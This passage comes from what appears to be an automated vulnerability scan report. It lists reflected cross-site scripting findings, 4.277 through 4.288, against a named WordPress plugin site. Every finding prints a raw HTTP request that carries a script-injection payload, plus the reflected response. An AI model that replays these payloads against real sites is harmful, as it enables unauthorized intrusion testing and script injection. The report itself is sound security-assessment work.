Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674555+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674555; expires=Thu, 02-Feb-2012 19:22:35 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default9eca7\"><script>alert(1)</script>5a311d7dae7/default.css" />
...[SNIP]...

4.277. http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbe4c"><script>alert(1)</script>dc71eef9483 was submitted in the REST URL parameter 9. This input was echoed as fbe4c\"><script>alert(1)</script>dc71eef9483 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.cssfbe4c"><script>alert(1)</script>dc71eef9483 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674560+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674560; expires=Thu, 02-Feb-2012 19:22:40 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.cssfbe4c\"><script>alert(1)</script>dc71eef9483" />
...[SNIP]...

4.278. http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/js/zoomer.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29fcf"><script>alert(1)</script>8b6006bf31 was submitted in the REST URL parameter 1. This input was echoed as 29fcf\"><script>alert(1)</script>8b6006bf31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site29fcf"><script>alert(1)</script>8b6006bf31/wp-content/plugins/superslider/js/zoomer.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674534+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674534; expires=Thu, 02-Feb-2012 19:22:14 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site29fcf\"><script>alert(1)</script>8b6006bf31/wp-content/plugins/superslider/js/zoomer.js" />
...[SNIP]...

4.279. http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/js/zoomer.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9adac"><script>alert(1)</script>8768e1887b4 was submitted in the REST URL parameter 2. This input was echoed as 9adac\"><script>alert(1)</script>8768e1887b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content9adac"><script>alert(1)</script>8768e1887b4/plugins/superslider/js/zoomer.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:15 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674535+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674535; expires=Thu, 02-Feb-2012 19:22:15 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:15 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content9adac\"><script>alert(1)</script>8768e1887b4/plugins/superslider/js/zoomer.js" />
...[SNIP]...

4.280. http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/js/zoomer.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e674"><script>alert(1)</script>394812d1f45 was submitted in the REST URL parameter 3. This input was echoed as 6e674\"><script>alert(1)</script>394812d1f45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins6e674"><script>alert(1)</script>394812d1f45/superslider/js/zoomer.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:16 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674537+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674537; expires=Thu, 02-Feb-2012 19:22:17 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins6e674\"><script>alert(1)</script>394812d1f45/superslider/js/zoomer.js" />
...[SNIP]...

4.281. http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/js/zoomer.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c560f"><script>alert(1)</script>35a04a94683 was submitted in the REST URL parameter 4. This input was echoed as c560f\"><script>alert(1)</script>35a04a94683 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/supersliderc560f"><script>alert(1)</script>35a04a94683/js/zoomer.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674543; expires=Thu, 02-Feb-2012 19:22:23 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/supersliderc560f\"><script>alert(1)</script>35a04a94683/js/zoomer.js" />
...[SNIP]...

4.282. http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/js/zoomer.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31b9"><script>alert(1)</script>7140731d2d5 was submitted in the REST URL parameter 5. This input was echoed as c31b9\"><script>alert(1)</script>7140731d2d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/jsc31b9"><script>alert(1)</script>7140731d2d5/zoomer.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674544+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/jsc31b9\"><script>alert(1)</script>7140731d2d5/zoomer.js" />
...[SNIP]...

4.283. http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/js/zoomer.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b3d1"><script>alert(1)</script>c6b5086f849 was submitted in the REST URL parameter 6. This input was echoed as 8b3d1\"><script>alert(1)</script>c6b5086f849 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/js/zoomer.js8b3d1"><script>alert(1)</script>c6b5086f849 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674546; expires=Thu, 02-Feb-2012 19:22:26 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:26 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/js/zoomer.js8b3d1\"><script>alert(1)</script>c6b5086f849" />
...[SNIP]...

4.284. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90df"><script>alert(1)</script>fc5f82eb8e was submitted in the REST URL parameter 1. This input was echoed as d90df\"><script>alert(1)</script>fc5f82eb8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sited90df"><script>alert(1)</script>fc5f82eb8e/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/sited90df\"><script>alert(1)</script>fc5f82eb8e/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css" />
...[SNIP]...

4.285. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d7f2"><script>alert(1)</script>072b6ccaa59 was submitted in the REST URL parameter 2. This input was echoed as 1d7f2\"><script>alert(1)</script>072b6ccaa59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content1d7f2"><script>alert(1)</script>072b6ccaa59/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content1d7f2\"><script>alert(1)</script>072b6ccaa59/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css" />
...[SNIP]...

4.286. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb38d"><script>alert(1)</script>3a5d2ee8686 was submitted in the REST URL parameter 3. This input was echoed as fb38d\"><script>alert(1)</script>3a5d2ee8686 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/pluginsfb38d"><script>alert(1)</script>3a5d2ee8686/superslider/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/pluginsfb38d\"><script>alert(1)</script>3a5d2ee8686/superslider/plugin-data/superslider/ssBase/default/scroll.css" />
...[SNIP]...

4.287. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b392f"><script>alert(1)</script>ed6e8acd146 was submitted in the REST URL parameter 4. This input was echoed as b392f\"><script>alert(1)</script>ed6e8acd146 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/supersliderb392f"><script>alert(1)</script>ed6e8acd146/plugin-data/superslider/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/supersliderb392f\"><script>alert(1)</script>ed6e8acd146/plugin-data/superslider/ssBase/default/scroll.css" />
...[SNIP]...

4.288. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35ed6"><script>alert(1)</script>d2c6d4601bc was submitted in the REST URL parameter 5. This input was echoed as 35ed6\"><script>alert(1)</script>d2c6d4601bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/plugin-data35ed6"><script>alert(1)</script>d2c6d4601bc/superslider/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
